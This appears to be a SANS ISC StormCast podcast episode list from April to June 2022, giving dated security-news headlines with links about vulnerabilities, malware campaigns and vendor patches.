Zyxel Security Advisory https://www.zyxel.com/support/Zyxel-security-advisory-for-CRLF-injection-vulnerability-in-some-legacy-firewalls.shtml
Fujitsu Centricstor Vulnerability https://research.nccgroup.com/2022/05/27/technical-advisory-fujitsu-centricstor-control-center-v8-1-unauthenticated-command-injection/
Meeting Owl Vulnerabilities https://www.modzero.com/static/meetingowl/Meeting_Owl_Pro_Security_Disclosure_Report_RELEASE.pdf
6/10/2022 8 minutes, 34 seconds

ISC StormCast for Thursday, June 9th, 2022

SANS RSA Panel (sorry, video no longer available)
Atlassian Confluence Attacks https://isc.sans.edu/forums/diary/Atlassian+Confluence+Exploits+Seen+By+Our+Honeypots+CVE202226134/28722/
Fake CCleaner Malvertisements https://blog.avast.com/fakecrack-campaign
Weakness in Verbatim Keypad Secure USB Drive https://blog.syss.com/posts/hacking-usb-flash-drives-part-1/
6/9/2022 5 minutes, 55 seconds

ISC StormCast for Wednesday, June 8th, 2022

The Trouble With Microsoft's Troubleshooters https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd
QBot Uses Follina https://twitter.com/threatinsight/status/1534227444915482625
Deadbolt Ransomware https://www.trendmicro.com/en_us/research/22/f/closing-the-door-deadbolt-ransomware-locks-out-vendors-with-mult.html
Google Android Updates https://source.android.com/security/bulletin/2022-06-01?hl=en
6/8/2022 5 minutes, 34 seconds

ISC StormCast for Tuesday, June 7th, 2022

MS-MSDT RTF Maldocs Analysis oledump Plugins https://isc.sans.edu/forums/diary/msmsdt+RTF+Maldoc+Analysis+oledump+Plugins/28718/
Cybercriminals Exploit Reverse Tunnel Services and URL Shorteners https://cloudsek.com/whitepapers_reports/cybercriminals-exploit-reverse-tunnel-services-and-url-shorteners-to-launch-large-scale-phishing-campaigns/
Unpatched Horde Webmail Bug https://blog.sonarsource.com/horde-webmail-rce-via-email/
Click Studios (Passwordstate) Code Signing Cert Used by Follina Malware https://cloudsek.com/whitepapers_reports/cybercriminals-exploit-reverse-tunnel-services-and-url-shorteners-to-launch-large-scale-phishing-campaigns/
6/7/2022 6 minutes, 18 seconds

ISC StormCast for Monday, June 6th, 2022

Sandbox Evasion... With Just a Filename! https://isc.sans.edu/forums/diary/Sandbox+Evasion+With+Just+a+Filename/28708/
Atlassian Exploit Released https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
GitLab Critical Security Release https://about.gitlab.com/releases/2022/06/01/critical-security-release-gitlab-15-0-1-released/
U-Boot Vulnerabilities https://research.nccgroup.com/2022/06/03/technical-advisory-multiple-vulnerabilities-in-u-boot-cve-2022-30790-cve-2022-30552/
Unisoc Baseband Chip Vulnerability https://research.checkpoint.com/2022/vulnerability-within-the-unisoc-baseband/
6/6/2022 5 minutes, 28 seconds

ISC StormCast for Friday, June 3rd, 2022

Quick Answers in Incident Response: RECmd.exe https://isc.sans.edu/forums/diary/Quick+Answers+in+Incident+Response+RECmdexe/28706/
Zero-Day Exploitation of Atlassian Confluence https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
Korenix Technology JetPort Backdoor https://sec-consult.com/vulnerability-lab/advisory/backdoor-account-in-korenix-technology-jetport-series/
Elasticsearch Data Wiped https://www.secureworks.com/blog/unsecured-elasticsearch-data-replaced-with-ransom-note
6/3/2022 6 minutes

ISC StormCast for Thursday, June 2nd, 2022

HTML Phishing Attachments - Now With Anti-Analysis Features https://isc.sans.edu/forums/diary/HTML+phishing+attachments+now+with+antianalysis+features/28702/
Unofficial Patch for CVE-2022-30190 (Follina) https://blog.0patch.com/2022/06/free-micropatches-for-follina-microsoft.html
Windows Search Vulnerability https://www.bleepingcomputer.com/news/security/new-windows-search-zero-day-added-to-microsoft-protocol-nightmare/
Call Forwarding Used to Compromise WhatsApp Accounts https://www.linkedin.com/posts/fb1h2s_beware-here-is-how-whatsapp-accounts-are-activity-6934386561048264704-NnFf/?utm_source=linkedin_share&utm_medium=member_desktop_web
Badkeys in Fuji Xerox and Canon Printers https://fermatattack.secvuln.info
6/2/2022 5 minutes, 55 seconds

ISC StormCast for Wednesday, June 1st, 2022

Follina Update https://isc.sans.edu/forums/diary/First+Exploitation+of+Follina+Seen+in+the+Wild/28698/ https://isc.sans.edu/forums/diary/New+Microsoft+Office+Attack+Vector+via+msmsdt+Protocol+Scheme+CVE202230190/28694/
Open Automation Software Platform Vulnerability https://blog.talosintelligence.com/2022/05/vuln-spotlight-open-automation-platform.html
Over 3.6 million MySQL servers found exposed on the Internet https://www.bleepingcomputer.com/news/security/over-36-million-mysql-servers-found-exposed-on-the-internet/
6/1/2022 5 minutes, 18 seconds

ISC StormCast for Tuesday, May 31st, 2022

New Microsoft Office Attack Vector via "ms-msdt" Protocol Scheme https://isc.sans.edu/forums/diary/New+Microsoft+Office+Attack+Vector+via+msmsdt+Protocol+Scheme/28694/
5/30/2022 7 minutes, 47 seconds

ISC StormCast for Friday, May 27th, 2022

Huge Signed PE Files https://isc.sans.edu/forums/diary/Huge+Signed+PE+File/28686/
VMware Authentication Bypass PoC https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive/
Quanta Server BMC Vulnerability https://eclypsium.com/2022/05/26/quanta-servers-still-vulnerable-to-pantsdown/
Windows 11 and Server 2022 Update Prevents Trend Micro Ransomware Protection https://success.trendmicro.com/dcx/s/solution/000291066?language=en_US
Nate Street: Advancing SIEM Log Management Strategies through Vendor-Agnostic Measurement https://www.sans.edu/cyber-research/38685/
5/27/2022 15 minutes, 40 seconds

ISC StormCast for Thursday, May 26th, 2022

Using NMAP to Assess Hosts in Load Balanced Clusters https://isc.sans.edu/forums/diary/Using+NMAP+to+Assess+Hosts+in+Load+Balanced+Clusters/28682/
Attacker Modifying Libraries Claims "Research" https://www.bleepingcomputer.com/news/security/hacker-says-hijacking-libraries-stealing-aws-keys-was-ethical-research/
Heroku GitHub Integration Re-Enabled Again https://blog.heroku.com/github-integration-update
Serious security vulnerability in Tails 5.0 https://tails.boum.org/security/prototype_pollution/index.en.html
Google Chrome Update https://chromereleases.googleblog.com/2022/05/stable-channel-update-for-desktop_24.html
5/26/2022 5 minutes, 9 seconds

ISC StormCast for Wednesday, May 25th, 2022

ctx Python Library Updated with "Extra" Features https://isc.sans.edu/forums/diary/ctx+Python+Library+Updated+with+Extra+Features/28678/
Zoom Updates https://explore.zoom.us/en/trust/security/security-bulletin/
VMware Exploit About to Be Released https://twitter.com/Horizon3Attack/status/1528935531333177344
Zyxel Firewalls, AP Controllers, APs Patch https://www.zyxel.com/support/multiple-vulnerabilities-of-firewalls-AP-controllers-and-APs.shtml
5/25/2022 5 minutes, 18 seconds

ISC StormCast for Tuesday, May 24th, 2022

Attacker Scanning for jQuery-File-Upload https://isc.sans.edu/forums/diary/Attacker+Scanning+for+jQueryFileUpload/28674/
Oracle Security Alert Advisory - CVE-2022-21500 https://www.oracle.com/security-alerts/alert-cve-2022-21500.html
How to find NPM dependencies vulnerable to account hijacking https://www.theregister.com/2022/05/23/npm_dependencies_vulnerable/
Pre-hijacked accounts https://arxiv.org/pdf/2205.10174.pdf
5/24/2022 5 minutes, 26 seconds

ISC StormCast for Monday, May 23rd, 2022

A "Zip Bomb" to Bypass Security Controls & Sandboxes https://isc.sans.edu/forums/diary/A+Zip+Bomb+to+Bypass+Security+Controls+Sandboxes/28670/
Cisco IOS XR Software Health Check Open Port Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-redis-ABJyE5xK
pwn2own Vancouver 2022 Results https://www.zerodayinitiative.com/blog/2022/5/18/pwn2own-vancouver-2022-the-results#three
Malicious PyPI Packages Drop Cobalt Strike https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux
Netgear Security Advisory for BR200 and BR500 (PSV-2021-0286) https://kb.netgear.com/000064712/Security-Advisory-for-Multiple-Security-Vulnerabilities-on-BR200-and-BR500-PSV-2021-0286
5/23/2022 6 minutes, 10 seconds

ISC StormCast for Friday, May 20th, 2022

Bumblebee Malware from TransferXL URLs https://isc.sans.edu/forums/diary/Bumblebee+Malware+from+TransferXL+URLs/28664/
Microsoft Out-of-Band Update Fixes Authentication Issues https://docs.microsoft.com/en-us/windows/release-health/status-windows-11-21h2#you-might-see-authentication-failures-on-the-server-or-client-for-services
SonicWall Patch for SMA 1000 https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0010
QNAP NAS Deadbolt Ransomware https://www.qnap.com/en/security-news/2022/take-immediate-actions-to-secure-qnap-nas-and-update-qts-to-the-latest-available-version
380,000 Open Kubernetes API Servers https://www.shadowserver.org/news/over-380-000-open-kubernetes-api-servers/
DoJ Announces New Policy for Charging Cases under the Computer Fraud and Abuse Act https://www.justice.gov/opa/pr/department-justice-announces-new-policy-charging-cases-under-computer-fraud-and-abuse-act
5/20/2022 6 minutes, 1 second

ISC StormCast for Thursday, May 19th, 2022

VMware Flaws https://core.vmware.com/vmsa-2022-0014-questions-answers-faq https://blog.barracuda.com/2022/05/17/threat-spotlight-attempts-to-exploit-new-vmware-vulnerabilities/
Tesla BLE Proximity Authentication Vulnerable to Relay Attacks https://research.nccgroup.com/2022/05/15/technical-advisory-ble-proximity-authentication-vulnerable-to-relay-attacks/
Credit Card Scraping via Malicious PHP Code https://www.ic3.gov/Media/News/2022/220516.pdf
Microsoft Updating Delegated Admin Privileges https://docs.microsoft.com/en-gb/partner-center/announcements/2022-may#13
5/19/2022 6 minutes, 48 seconds

ISC StormCast for Wednesday, May 18th, 2022

Use Your Browser Internal Password Vault... or Not? https://isc.sans.edu/forums/diary/Use+Your+Browser+Internal+Password+Vault+or+Not/28658/
SQL Server Brute Forcing https://twitter.com/MsftSecIntel/status/1526680337216114693
UpdateAgent Adapts Again https://www.jamf.com/blog/updateagent-adapts-again/
CISA Known Exploited Vulnerabilities Catalog Updated https://www.cisa.gov/uscert/ncas/current-activity/2022/05/10/cisa-adds-one-known-exploited-vulnerability-catalog
5/18/2022 6 minutes, 9 seconds

ISC StormCast for Tuesday, May 17th, 2022

Apple Patches Everything https://isc.sans.edu/forums/diary/Apple+Patches+Everything/28654/
Evil Never Sleeps: When Wireless Malware Stays on After Turning Off iPhones https://arxiv.org/pdf/2205.06114.pdf
Third-Party Web Trackers Log What You Type Before Submitting https://homes.esat.kuleuven.be/~asenol/leaky-forms/
5/17/2022 6 minutes, 18 seconds

ISC StormCast for Monday, May 16th, 2022

From 0-Day to Mirai: 7 Days of BIG-IP Exploits https://isc.sans.edu/forums/diary/From+0Day+to+Mirai+7+days+of+BIGIP+Exploits/28644/
SonicWall Vulnerabilities Patched https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0009
ZoneAlarm Patch https://www.zonealarm.com/software/extreme-security/release-history
Taking Over npm Accounts via Expired Publisher Email Domains https://thehackerblog.com/zero-days-without-incident-compromising-angular-via-expired-npm-publisher-email-domains-7kZplW4x/
5/16/2022 6 minutes, 26 seconds

ISC StormCast for Friday, May 13th, 2022

When Get-WebRequest Fails You https://isc.sans.edu/forums/diary/When+GetWebRequest+Fails+You/28640/
HP PC BIOS Security Updates https://support.hp.com/us-en/document/ish_6184733-6184761-16/hpsbhf03788
Intel BIOS Advisory https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00601.html
Zyxel RCE Vulnerability (CVE-2022-30525) https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
5/13/2022 4 minutes, 58 seconds

ISC StormCast for Thursday, May 12th, 2022

TA578 Using Thread-Hijacked Emails to Push ISO Files for Bumblebee Malware https://isc.sans.edu/forums/diary/TA578+using+threadhijacked+emails+to+push+ISO+files+for+Bumblebee+malware/28636/
Google Drive Emerges as Top App for Malware Downloads https://www.helpnetsecurity.com/2022/05/11/malicious-pdf-search-engines/
Vanity URL Abuse https://www.varonis.com/blog/url-spoofing
npm Supply Chain Attack Turns Out to be Part of Penetration Test https://jfrog.com/blog/npm-supply-chain-attack-targets-german-based-companies/
5/12/2022 5 minutes, 33 seconds

ISC StormCast for Wednesday, May 11th, 2022

Microsoft May 2022 Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+May+2022+Patch+Tuesday/28632/
Adobe Updates https://helpx.adobe.com/security/security-bulletin.html
npm "foreach" Package Domain Takeover https://www.theregister.com/2022/05/10/security_npm_email/
5/11/2022 5 minutes, 32 seconds

ISC StormCast for Tuesday, May 10th, 2022

Octopus Backdoor is Back with a New Embedded Obfuscated Bat File https://isc.sans.edu/forums/diary/Octopus+Backdoor+is+Back+with+a+New+Embedded+Obfuscated+Bat+File/28628/#comments
CVE-2022-1388 (BIG-IP) Exploits https://twitter.com/sans_isc/status/1523741896707043328 https://github.com/horizon3ai/CVE-2022-1388
Trend Micro False Positive Aftermath https://success.trendmicro.com/dcx/s/solution/000290966?language=en_US
Microsoft Azure Synapse Vulnerability (CVE-2022-29972) https://orca.security/resources/blog/azure-synapse-analytics-security-advisory/ https://msrc-blog.microsoft.com/2022/05/09/vulnerability-mitigated-in-the-third-party-data-connector-used-in-azure-synapse-pipelines-and-azure-data-factory-cve-2022-29972/
5/10/2022 5 minutes, 51 seconds

ISC StormCast for Monday, May 9th, 2022

F5 BIG-IP Unauthenticated RCE Vulnerability (CVE-2022-1388) https://isc.sans.edu/forums/diary/F5+BIGIP+Unauthenticated+RCE+Vulnerability+CVE20221388/28624/
QNAP QVR Update https://www.qnap.com/de-de/security-advisory/qsa-22-07
Raspberry Robin Worm https://redcanary.com/blog/raspberry-robin/
rubygems CVE-2022-29176 explained https://greg.molnar.io/blog/rubygems-cve-2022-29176/
What is the simplest malware in the world? https://isc.sans.edu/forums/diary/What+is+the+simplest+malware+in+the+world/28620/
5/9/2022, 5 minutes, 53 seconds

ISC StormCast for Friday, May 6th, 2022

Password-protected Excel Spreadsheet Pushes Remcos RAT https://isc.sans.edu/forums/diary/Passwordprotected+Excel+spreadsheet+pushes+Remcos+RAT/28616/
Microsoft, Apple, Google Accelerate FIDO Standard Implementation https://www.theregister.com/2022/05/05/microsoft-apple-google-fido/
Heroku Admits Breach https://status.heroku.com/incidents/2413
5/6/2022, 5 minutes, 36 seconds

ISC StormCast for Thursday, May 5th, 2022

Finding the Real "Last Patched" Day (Interim Version) https://isc.sans.edu/forums/diary/Finding+the+Real+Last+Patched+Day+Interim+Version/28610/
Fake Windows Updates Install Ransomware https://www.bleepingcomputer.com/news/security/fake-windows-10-updates-infect-you-with-magniber-ransomware/
Vulnerabilities in Ransomware https://www.malvuln.com
Heroku Forces Password Reset https://status.heroku.com/incidents/2413
Cisco Patches Enterprise NFV Infrastructure Software https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-NFVIS-MUL-7DySRX9
Big-IP iControl REST Vulnerability https://support.f5.com/csp/article/K23605346
5/5/2022, 5 minutes, 54 seconds

ISC StormCast for Wednesday, May 4th, 2022

Some Honeypot Updates https://isc.sans.edu/forums/diary/Some+Honeypot+Updates/28608/
TLStorm 2 - NanoSSL TLS Library Misuse https://www.armis.com/blog/tlstorm-2-nanossl-tls-library-misuse-leads-to-vulnerabilities-in-common-switches/
Unpatched DNS Bug in uClibc and uClibc-ng Library https://www.nozominetworks.com/blog/nozomi-networks-discovers-unpatched-DNS-bug-in-popular-c-standard-library-putting-iot-at-risk/
Abusing Security Software to Sideload PlugX and ShadowPad https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/
Microsoft Edge Update Triggers Trend Micro AV https://success.trendmicro.com/forum/s/question/0D54T00001QDqzgSAD/we-are-getting-this-message-from-every-client-since-several-minutesis-it-a-false-positiv-error-or-do-we-have-a-real-trojaner-problem-
5/4/2022, 6 minutes, 9 seconds

ISC StormCast for Tuesday, May 3rd, 2022

Detecting VSTO Office Files with ExifTool https://isc.sans.edu/forums/diary/Detecting+VSTO+Office+Files+With+ExifTool/28604/
The Gmail SMTP Relay Service Exploit https://www.avanan.com/blog/the-gmail-smtp-relay-service-exploit
OpenSSF Package Analysis https://openssf.org/blog/2022/04/28/introducing-package-analysis-scanning-open-source-packages-for-malicious-behavior/
M1 Prefetcher Data Leak https://www.prefetchers.info
5/3/2022, 5 minutes, 45 seconds

ISC StormCast for Monday, May 2nd, 2022

Using Passive DNS Sources for Reconnaissance and Enumeration https://isc.sans.edu/forums/diary/Using+Passive+DNS+sources+for+Reconnaissance+and+Enumeration/28596/
Microsoft Edge Secure Network https://support.microsoft.com/en-gb/topic/use-the-microsoft-edge-secure-network-to-protect-your-browsing-885472e2-7847-4d89-befb-c80d3dda6318
Sina Weibo Making Users' IPs and Location Public https://www.theregister.com/2022/04/29/weibo_location_services_default/ https://weibo.com/u/1934183965?layerid=4763194269108760
SonicWall Global VPN Client DLL Search Order Hijacking https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0036
Zoom Updated https://explore.zoom.us/en/trust/security/security-bulletin/
5/2/2022, 4 minutes, 48 seconds

ISC StormCast for Friday, April 29th, 2022

A Day of SMB: What does our SMB/RPC Honeypot see? CVE-2022-26809 https://isc.sans.edu/forums/diary/A+Day+of+SMB+What+does+our+SMBRPC+Honeypot+see+CVE202226809/28594/
Azure PostgreSQL Privilege Escalation https://www.wiz.io/blog/wiz-research-discovers-extrareplica-cross-account-database-vulnerability-in-azure-postgresql/
Security alert: Attack campaign involving stolen OAuth user tokens https://github.blog/2022-04-15-security-alert-stolen-oauth-user-tokens
Netatalk Vulnerability Affecting Synology, QNAP, Others? https://www.synology.com/en-global/security/advisory/Synology_SA_22_06
4/29/2022, 6 minutes, 18 seconds

ISC StormCast for Thursday, April 28th, 2022

MITRE ATT&CK v11 https://isc.sans.edu/forums/diary/MITRE+ATTCK+v11+a+small+update+that+can+help+not+just+with+detection+engineering/28590/
Microsoft Special Report: Ukraine https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd
Linux Privilege Escalation Nimbuspwn https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/
npm Package Planting https://blog.aquasec.com/npm-package-planting
4/28/2022, 6 minutes, 7 seconds

ISC StormCast for Wednesday, April 27th, 2022

WSO2 Vuln Exploited to Install Crypto Coin Miners https://isc.sans.edu/forums/diary/WSO2+RCE+exploited+in+the+wild/28586/
Core Impact Backdoor Delivered Via VMware Vulnerability https://blog.morphisec.com/vmware-identity-manager-attack-backdoor
VirusTotal Exploit Update https://twitter.com/bquintero/status/1518738072820670464
Emotet Experimenting With New Delivery Techniques https://www.proofpoint.com/us/blog/threat-insight/emotet-tests-new-delivery-techniques
4/27/2022, 6 minutes, 22 seconds

ISC StormCast for Tuesday, April 26th, 2022

Simple PDF Linking to Malicious Content https://isc.sans.edu/forums/diary/Simple+PDF+Linking+to+Malicious+Content/28582/
VirusTotal Remote Code Execution https://www.cysrc.com/blog/virus-total-blog
Apple's Private Relay can Cause the System to Ignore Firewall Rules https://mullvad.net/en/blog/2022/4/25/apples-private-relay-can-cause-the-system-to-ignore-firewall-rules/
Emotet Breaks and Later Fixes Installer https://www.bleepingcomputer.com/news/security/emotet-malware-infects-users-again-after-fixing-broken-installer/
4/26/2022, 5 minutes, 59 seconds

ISC StormCast for Monday, April 25th, 2022

Analyzing a Phishing Word Document https://isc.sans.edu/forums/diary/Analyzing+a+Phishing+Word+Document/28562/
Targeting Roku Streaming Devices https://isc.sans.edu/forums/diary/Are+Roku+Streaming+Devices+Safe+from+Exploitation/28578/
JWT Null Signature Vulnerability PoC https://github.com/DataDog/security-labs-pocs/tree/main/proof-of-concept-exploits/jwt-null-signature-vulnerable-app
Expat XML Vulnerabilities https://www.ibm.com/support/pages/node/6573293
Jira Vulnerability https://confluence.atlassian.com/jira/jira-security-advisory-2022-04-20-1115127899.html
4/25/2022, 5 minutes

ISC StormCast for Friday, April 22nd, 2022

Multi Cryptocurrency Clipboard Swapper https://isc.sans.edu/forums/diary/MultiCryptocurrency+Clipboard+Swapper/28574/
Amazon Fixes AWS log4j Fix https://aws.amazon.com/security/security-bulletins/AWS-2022-006/
Cisco Fixes https://tools.cisco.com/security/center/publicationListing.x
Psychic Signature PoC https://github.com/khalednassar/CVE-2022-21449-TLS-PoC
ALAC Audio Decoder Bug https://blog.checkpoint.com/2022/04/21/largest-mobile-chipset-manufacturers-used-vulnerable-audio-decoder-2-3-of-android-users-privacy-around-the-world-were-at-risk/
4/22/2022, 6 minutes, 26 seconds

ISC StormCast for Thursday, April 21st, 2022

AA Distribution Qakbot (Qbot) Infection with DarkVNC https://isc.sans.edu/forums/diary/aa+distribution+Qakbot+Qbot+infection+with+DarkVNC+traffic/28568/
Java Psychic Signatures https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/
Snort DoS Vulnerability https://claroty.com/2022/04/14/blog-research-blinding-snort-breaking-the-modbus-ot-preprocessor/
4/21/2022, 5 minutes, 45 seconds

ISC StormCast for Wednesday, April 20th, 2022

u-boot Password Reset https://isc.sans.edu/forums/diary/Resetting+Linux+Passwords+with+UBoot+Bootloaders/28564/
Oracle CPU https://www.oracle.com/security-alerts/cpuapr2022.html
MetaMask iCloud Phishing https://www.bleepingcomputer.com/news/security/hackers-steal-655k-after-picking-metamask-seed-from-icloud-backup/
SMB1 Gone From Windows 11 Home https://techcommunity.microsoft.com/t5/storage-at-microsoft/smb1-now-disabled-by-default-for-windows-11-home-insiders-builds/ba-p/3289473
Lenovo UEFI/BIOS Vulnerability https://support.lenovo.com/us/en/product_security/ps500483-lenovo-system-update-privilege-escalation-vulnerability https://support.lenovo.com/de/de/product_security/LEN-84943
4/20/2022, 6 minutes, 15 seconds

ISC StormCast for Tuesday, April 19th, 2022

Sysmon's RegistryEvent (Value Set) and Binary Data https://isc.sans.edu/forums/diary/Sysmons+RegistryEvent+Value+Set/28558/
Ukraine CERT Posts: IcedID and Zimbra Flaw https://cert.gov.ua/article/39606 https://cert.gov.ua/article/39609
New NSO Pegasus Exploit Spotted in the Wild https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/
Unofficial Windows 11 Upgrade Delivers Spyware https://www.bleepingcomputer.com/news/security/unofficial-windows-11-upgrade-installs-info-stealing-malware/
4/19/2022, 4 minutes, 56 seconds

ISC StormCast for Monday, April 18th, 2022

Office Now Protects You From Malicious ISO Files https://isc.sans.edu/forums/diary/Office+Protects+You+From+Malicious+ISO+Files/28554/
Github Stolen OAUTH User Tokens https://github.blog/2022-04-15-security-alert-stolen-oauth-user-tokens/
Git For Windows Vulnerability https://nvd.nist.gov/vuln/detail/CVE-2022-24765
Cisco Wireless Controller Bug https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-auth-bypass-JRNhV4fF
4/18/2022, 5 minutes, 36 seconds

ISC StormCast for Friday, April 15th, 2022

An Update on CVE-2022-26809 MSRPC Vulnerability - PATCH NOW https://isc.sans.edu/forums/diary/An+Update+on+CVE202226809+MSRPC+Vulnerabliity+PATCH+NOW/28550/
Webcast: https://www.sans.org/webcasts/cve-2022-26809-ms-rpc-vulnerability-analysis/ https://twitter.com/splinter_code/status/1514653941304369153
Google Chrome 0-Day Patch https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html
Cisco Webex Phones Home Audio Telemetry https://wiscprivacy.com/papers/vca_mute.pdf
Grafana Enterprise Vulnerability https://grafana.com/blog/2022/04/12/grafana-enterprise-8.4.6-released-with-high-severity-security-fix/
4/15/2022, 5 minutes, 28 seconds

ISC StormCast for Thursday, April 14th, 2022

How is Ukrainian Internet Holding Up During Russian Invasion https://isc.sans.edu/forums/diary/How+is+Ukrainian+internet+holding+up+during+the+Russian+invasion/28546/
Update on Windows Patches and CVE-2022-26809 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26809
Adobe Updates https://helpx.adobe.com/security/products/photoshop/apsb22-20.html
Apache Struts 2 Update https://cwiki.apache.org/confluence/display/WW/S2-062
4/14/2022, 5 minutes, 52 seconds

ISC StormCast for Wednesday, April 13th, 2022

Microsoft April 2022 Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+April+2022+Patch+Tuesday/28542/
NGINX Statement To LDAP Weakness https://www.nginx.com/blog/addressing-security-weaknesses-nginx-ldap-reference-implementation/
Attacks on Ukrainian Power Grid https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/
4/13/2022, 6 minutes, 45 seconds

ISC StormCast for Tuesday, April 12th, 2022

Spring: It isn't just about Spring4Shell. https://isc.sans.edu/forums/diary/Spring+It+isnt+just+about+Spring4Shell+Spring+Cloud+Function+Vulnerabilities+are+being+probed+too/28538/
Microsoft Windows Autopatch https://techcommunity.microsoft.com/t5/windows-it-pro-blog/get-current-and-stay-current-with-windows-autopatch/ba-p/3271839
More npm protestware https://github.com/Yaffle/EventSource/commit/de137927e13d8afac153d2485152ccec48948a7a
Raspberry Pi Update https://www.raspberrypi.com/news/raspberry-pi-bullseye-update-april-2022/
4/12/2022, 5 minutes, 59 seconds

ISC StormCast for Monday, April 11th, 2022

Misc Spring4Shell Items https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67 https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html https://github.com/AgainstTheWest/NginxDay
Russian Certificate Authority Update https://koen.engineer/russias-certificate-authority-for-sanctioned-organizations-645d61af8ac6
Conti Source Code Leak Leads to Copycats https://www.bleepingcomputer.com/news/security/hackers-use-contis-leaked-ransomware-to-attack-russian-companies/
4/11/2022, 6 minutes, 15 seconds

ISC StormCast for Friday, April 8th, 2022

What is BIMI https://isc.sans.edu/forums/diary/What+is+BIMI+and+how+is+it+supposed+to+help+with+Phishing/28528/
Watchguard Vulnerability behind Cyclops Blink https://techsearch.watchguard.com/KB?type=Article&SFDCID=kA16S000000SOCGSA4&lang=en_US
Malware Targeting Amazon Lambdas https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/
Ashley Taylor: Doppelgaengers: Finding Job Scammers Who Steal Brand Identities https://www.sans.edu/cyber-research/doppelgangers-finding-job-scammers-who-steal-brand-identities/
4/8/2022, 15 minutes, 36 seconds

ISC StormCast for Thursday, April 7th, 2022

Windows MetaStealer Malware https://isc.sans.edu/forums/diary/Windows+MetaStealer+Malware/28522/
US Justice Department Takes Down Cyclops Blink Botnet https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-disruption-botnet-controlled-russian-federation
VMWare Bugs https://www.vmware.com/security/advisories.html
Palo Alto CVE-2022-0778 https://security.paloaltonetworks.com/CVE-2022-0778
Unpatched Apple Bug https://www.intego.com/mac-security-blog/apple-neglects-to-patch-zero-day-wild-vulnerabilities-for-macos-big-sur-catalina/
4/7/2022, 6 minutes, 18 seconds

ISC StormCast for Wednesday, April 6th, 2022

WebLogic Crypto Miner Malware Disabling Alibaba Cloud Monitoring Tools https://isc.sans.edu/forums/diary/WebLogic+Crypto+Miner+Malware+Disabling+Alibaba+Cloud+Monitoring+Tools/28520/
Cicada: Chinese APT Group Widens Targeting in Recent Espionage Activity https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks
New Security Features for Windows 11 https://www.microsoft.com/security/blog/2022/04/05/new-security-features-for-windows-11-will-help-protect-hybrid-work/
Fin7 Power Hour: Adversary Archaeology and Evolution of FIN7 https://www.mandiant.com/resources/evolution-of-fin7
4/6/2022, 6 minutes, 30 seconds

ISC StormCast for Tuesday, April 5th, 2022

Emptying the Phishtank: Are WordPress Sites the Mosquitoes of the Internet https://isc.sans.edu/forums/diary/Emptying+the+Phishtank+Are+WordPress+sites+the+Mosquitoes+of+the+Internet/28516/
Mailchimp Breach Used to Target Trezor Users https://www.bleepingcomputer.com/news/security/hackers-breach-mailchimps-internal-tools-to-target-crypto-customers/
Proactively Prevent Secret Leaks With GitHub Advanced Security Secret Scanning https://github.blog/2022-04-04-push-protection-github-advanced-security/
TruffleHog v3 https://trufflesecurity.com/blog/introducing-trufflehog-v3
Russian Certificates (Chinese article) https://blog.netlab.360.com/review-revoke-russia-ssl-certificates/
4/5/2022, 6 minutes, 13 seconds

ISC StormCast for Monday, April 4th, 2022

GitLab Critical Security Release https://about.gitlab.com/releases/2022/03/31/critical-security-release-gitlab-14-9-2-released/
ViaSat KA-SAT Network Cyber Attack https://www.viasat.com/about/newsroom/blog/ka-sat-network-cyber-attack-overview/
MacOS Bug Enables Phishing https://rambo.codes/posts/2022-03-15-how-a-macos-bug-could-have-allowed-for-a-serious-phishing-attack-against-users
PHP Supply Chain Attack on PEAR https://blog.sonarsource.com/php-supply-chain-attack-on-pear
4/4/2022, 6 minutes, 19 seconds
Episode Artwork

ISC StormCast for Friday, April 1st, 2022

Spring Vulnerability Update - Exploitation Attempts CVE-2022-22965 https://isc.sans.edu/forums/diary/Spring+Vulnerability+Update+Exploitation+Attempts+CVE202222965/28504/
Apple Patches 0 Day Vulnerability https://isc.sans.edu/forums/diary/Apple+Patches+Actively+Exploited+Vulnerability+in+macOS+iOS+and+iPadOS/28506/
Wyze Cam Vulnerabilities https://www.bitdefender.com/files/News/CaseStudies/study/413/Bitdefender-PR-Whitepaper-WCam-creat5991-en-EN.pdf
Zyxel Security Advisory https://www.zyxel.com/support/forgery-vulnerabilities-of-select-Armor-home-routers.shtml
4/1/2022 (5 minutes, 35 seconds)
Episode Artwork

ISC StormCast for Thursday, March 31st, 2022

